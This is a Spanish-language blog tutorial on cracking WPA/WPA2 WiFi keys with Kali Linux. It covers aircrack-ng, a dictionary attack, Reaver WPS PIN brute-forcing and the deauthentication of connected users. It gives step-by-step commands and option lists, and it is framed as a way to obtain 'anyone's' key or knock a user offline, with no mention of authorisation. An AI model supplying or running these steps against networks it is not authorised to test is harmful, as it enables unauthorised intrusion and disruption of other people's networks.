Como descifrar Red WiFi WPAWPA2 usando KALI LINUX

Hoy veremos como descifrar Red WiFi WPAWPA2. Se trata de un artículo que, si bien tiene la función de informar, también busca el objetivo de enseñar. Son muchas las personas que han pedido este tema y, probando una que otra herramienta, se puede obtener la clave de cualquier persona. Por ejemplo, tenemos “Aircrack”, un potente software con el que podríamos hasta evitar que un usuario logre conectarse a Internet.

También te recomendamos leer:

Vamos a definirlo, primeramente.

¿Qué es Aircrack? ¿Sirve para descifrar Red WiFi WPAWPA2?

descifrar Red WiFi WPAWPA2

Herramiento Aircrack, para descifrar Red WiFi WPAWPA2

Se trata de una suite de software para la seguridad inalámbrica. Ella radica en estudiar cada uno de los paquetes de redes, utilizar el descifrador de redes WEP y WPA/WPA2-PSK y otro grupo más de instrumentos para la auditoría inalámbrica. Son varias las herramientas que se han agregado en la suite, pero entre las más populares, están las siguientes:

  • airbase-ng
  • aircrack-ng
  • airdecap-ng
  • airdecloak-ng
  • airdriver-ng
  • aireplay-ng
  • airmon-ng
  • airodump-ng
  • airolib-ng
  • airserv-ng
  • airtun-ng
  • easside-ng
  • packetforge-ng
  • tkiptun-ng
  • wesside-ng
  • airdecloak-ng

En cambio, los instrumentos más empleados para la correcta auditoría inalámbrica son:

  • Aircrack-ng (descifra la clave de los vectores de inicio)
  • Airodump-ng (escanea las redes y captura vectores de inicio)
  • Aireplay-ng (inyecta tráfico para elevar la captura de vectores de inicio)
  • Airmon-ng (establece la tarjeta inalámbrica en modo monitor, para poder capturar e inyectar vectores)

Es momento de entrar un poco en acción

iwconfig

Se puede apreciar que iwconfig se maneja con el objetivo de ir viendo y dándole los ajustes a la configuración de su interfaz de red el cual son bien concretos para la correcta función inalámbrica (un ejemplo sería la de usar la interfaz del nombre, su frecuencia y el SSID). Asimismo, se puede usar para exhibir todos los datos inalámbricos que fueron extraídos partiendo de /proc/net/wireless.

airmon-ng check kill wlan0

El comando presentado ahora detendrá a los administradores de la red para después “acribillar” cada uno de los procesos que permiten interferencia.

airmon-ng start wlan0

Es momento de habilitar o activar el modo de monitor

Nota: Es imprescindible que se maten los gestores de la red previa a la colocación del modo monitor. En este caso, se mostrará la información de la tarjeta de red y nos mostrará “wlan0mon”.

airodump-ng wlan0mon

Empezará a escanear con el fin de obtener el BSSID o algunos ratos de la misma red.

airodump-ng -c (channel) –bssid (BSSID) -w /root/ wlan0mon

-c Se pondrá en el canal que nos enseñó el comando anterior.
–bssid Se refiere al paquete de red inalámbrica.
-w El lugar donde quieres que guarde la data.
wlan0mon Será la interfaz de la red que usemos en el procedimiento.

aireplay-ng -0 0 -a (BSSID) -c (Station) wlan0mon

En caso de ataques, exceptuando el de autenticación y la falsa autentica, podrías utilizar algunos filtros de los mostrados para restringir los paquetes que se tendrán que usar. El filtro que más uso posee es el “-b” al momento de elegir cualquier punto en concreto.

Opciones de filtro:

-b bssid : Dirección MAC del punto de acceso
-d dmac : Dirección MAC de destino
-s smac : Dirección MAC origen (source)
-m len : Longitud mínima del paquete
-n len : Longitud máxima del paquete
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit

Opciones de inyección:

-x nbpps : número de paquetes por segundo
-p fctrl : fijar palabra “frame control” (hexadecimal)
-a bssid : fijar dirección MAC del AP
-c dmac : fijar dirección MAC de destino
-h smac : fijar dirección MAC origen
-e essid : ataque de falsa autenticación: nombre del AP
-j : ataque arp-replay: inyectar paquetes FromDS
-g valor : cambiar tamaño de buffer (default: 8)
-k IP : fijar IP de destino en fragmentos
-l IP : fijar IP de origen en fragmentos
-o npckts : número de paquetes por burst (-1)
-q sec : segundos entre paquetes “sigo aquí” o keep-alives (-1)
-y prga : keystream para autenticación compartida (shared key)

aircrack-ng -a2 -b (BSSID) -w (diccionario) (UBICACION .cap)

Una vez realizado, se deberá escanear todo el diccionario para conseguir las claves.

MÉTODO DOS CON REAVER

¿Qué es Reaver?

Reaver es un programa que ejecuta un ataque agresivo al WiFi Protected número de pin Configuración del punto de entrada. Cuando se ha hallado el PINWPS, WPA PSK, podría ser recuperado y, de forma opcional, los ajustes inalámbricos de la AP podrían configurarse. Por otra parte, Reaver no puede soportar la re-configuración de esta AP, pero, puede conseguirse usando wpa_supplicant en lugar del pasado WPS.

wash -i wlan0mon

Ahora mismo, buscará escanear cada una de las redes cercanas y conseguirá así el BSSID, Channel.

reaver -i wlan0mon -b  (BSSID) -vv -k 1

reaver -i wlan0mon -b  (BSSID) -c (channel) -N -S -vv -k 1

Ya con esto, habrás hecho el ataque con éxito en y asi poder descifrar Red WiFi WPAWPA2 con Kali Linux 2.0. Si tienes alguna otra duda, puedes dejar un comentario con la pregunta que quieras.

Leave a Reply

*